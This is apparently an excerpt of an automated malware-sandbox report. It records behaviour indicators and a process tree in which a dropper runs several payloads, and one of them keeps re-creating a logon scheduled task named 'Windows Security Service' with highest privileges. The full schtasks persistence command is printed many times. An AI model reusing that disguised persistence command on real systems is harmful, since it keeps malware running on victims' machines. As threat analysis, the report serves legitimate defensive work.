Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeDebugPrivilege 5500 discord.exe Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE Token: SeShutdownPrivilege 3532 Explorer.EXE Token: SeCreatePagefilePrivilege 3532 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 2752 procexp64.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe 3884 msedge.exe -
Suspicious use of SetWindowsHookEx 27 IoCs
pid Process 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2336 firefox.exe 2752 procexp64.exe 4272 TORRENTOLD-1.exe 1884 3.exe 3532 Explorer.EXE 3532 Explorer.EXE 5648 seksiak.exe 3532 Explorer.EXE 4740 k360.exe 3532 Explorer.EXE 6656 runtime.exe 3532 Explorer.EXE 3532 Explorer.EXE 3532 Explorer.EXE 3532 Explorer.EXE 1736 procexp64.exe 6100 prueba.exe 5956 c3.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 3124 wrote to memory of 2336 3124 firefox.exe 95 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1212 2336 firefox.exe 96 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 PID 2336 wrote to memory of 1232 2336 firefox.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2580446533-3148764140-1073334258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Downloads MZ/PE file
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3532 -
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip2⤵PID:1256
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Detected potential entity reuse from brand MICROSOFT.
- Checks processor information in registry
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27205 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dbacc17-2190-48f7-8498-c607d59bfb24} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" gpu4⤵PID:1212
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2344 -prefsLen 27083 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08001bdf-c121-4238-b1af-6c61c793a98b} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" socket4⤵
- Checks processor information in registry
PID:1232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3044 -childID 1 -isForBrowser -prefsHandle 3164 -prefMapHandle 1272 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a36d3bcf-24cc-443d-898f-ec6be9d37e17} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:1652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3936 -childID 2 -isForBrowser -prefsHandle 3928 -prefMapHandle 3924 -prefsLen 32457 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52ee52d8-7114-41df-8703-f9435f2c4d90} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:4840
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4836 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4780 -prefMapHandle 4796 -prefsLen 32457 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5eed5eb6-a699-4c06-9d8f-a5bebfa0ead5} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" utility4⤵
- Checks processor information in registry
PID:768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5472 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cd091f1-fbb8-4cbc-829d-46f411525bd1} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:1824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 4 -isForBrowser -prefsHandle 5516 -prefMapHandle 5512 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6ccf5d2-3bca-4189-971d-806f782b7672} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:2596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5916 -childID 5 -isForBrowser -prefsHandle 5748 -prefMapHandle 5744 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a72d78ca-ad75-4efc-af7d-78e9dcdcad49} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:2980
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5860 -childID 6 -isForBrowser -prefsHandle 2992 -prefMapHandle 3028 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f71af2b7-204d-4c0d-8dc1-78a21ea6b4d6} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:1812
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6336 -childID 7 -isForBrowser -prefsHandle 6220 -prefMapHandle 6356 -prefsLen 28044 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c766804f-1e7c-4295-830b-b122c89c9997} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" tab4⤵PID:116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6484 -parentBuildID 20240401114208 -prefsHandle 6488 -prefMapHandle 3604 -prefsLen 33885 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62c63293-06f9-488e-9d58-24833c9019f9} 2336 "\\.\pipe\gecko-crash-server-pipe.2336" rdd4⤵PID:3080
-
-
-
-
C:\Program Files\sysinternals\procexp64.exe"C:\Program Files\sysinternals\procexp64.exe"2⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Sets service image path in registry
- Enumerates connected drives
- Drops file in System32 directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3884 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xec,0xe4,0x128,0x12c,0x150,0x7ffbdcfa46f8,0x7ffbdcfa4708,0x7ffbdcfa47183⤵PID:1748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:23⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:83⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:13⤵PID:5028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:13⤵PID:1084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,293420041860977482,13085016558336281812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:13⤵PID:3632
-
-
-
C:\Users\Admin\Desktop\Mal\4363463463464363463463463.exe"C:\Users\Admin\Desktop\Mal\4363463463464363463463463.exe"2⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4720 -
C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4392 -
C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"4⤵
- Executes dropped EXE
PID:2140
-
-
C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"C:\Users\Admin\Desktop\Mal\Files\TORRENTOLD-1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 3044⤵
- Program crash
PID:1844
-
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3T8lk0cBKW29.bat" "4⤵PID:5368
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:5424
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5444
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5648 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:6208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Cz2652PRxxhj.bat" "6⤵PID:5564
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:5728
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:648
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:7140 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M1ukfPT6Uvbv.bat" "8⤵PID:5568
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:6696
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6844
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
PID:1916 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:5744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rXHd1BEAOF5S.bat" "10⤵PID:7044
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:5200
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6584
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
PID:5480 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tSkHKhJXQHy6.bat" "12⤵PID:6248
-
C:\Windows\system32\chcp.comchcp 6500113⤵PID:6764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5728
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
PID:6556 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
PID:6808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\52EXZ2GQcbUE.bat" "14⤵PID:6976
-
C:\Windows\system32\chcp.comchcp 6500115⤵PID:2904
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6512
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"15⤵
- Checks computer location settings
- Executes dropped EXE
PID:6804 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
PID:1548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cFNmfL7BjXPf.bat" "16⤵PID:472
-
C:\Windows\system32\chcp.comchcp 6500117⤵PID:6276
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7032
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
PID:6912 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f18⤵
- Scheduled Task/Job: Scheduled Task
PID:5948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\25OrgF6SjnOw.bat" "18⤵PID:5812
-
C:\Windows\system32\chcp.comchcp 6500119⤵PID:1424
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4808
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
PID:2956 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
PID:920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rAsBWkzsIkN4.bat" "20⤵PID:5572
-
C:\Windows\system32\chcp.comchcp 6500121⤵PID:6764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1080
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"21⤵
- Checks computer location settings
- Executes dropped EXE
PID:5292 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
PID:3400
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NhTULChyzqho.bat" "22⤵PID:5432
-
C:\Windows\system32\chcp.comchcp 6500123⤵PID:1776
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5776
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"23⤵PID:3036
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
PID:6752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gah6zCQ7NiO8.bat" "24⤵PID:5644
-
C:\Windows\system32\chcp.comchcp 6500125⤵PID:2388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7000
-
-
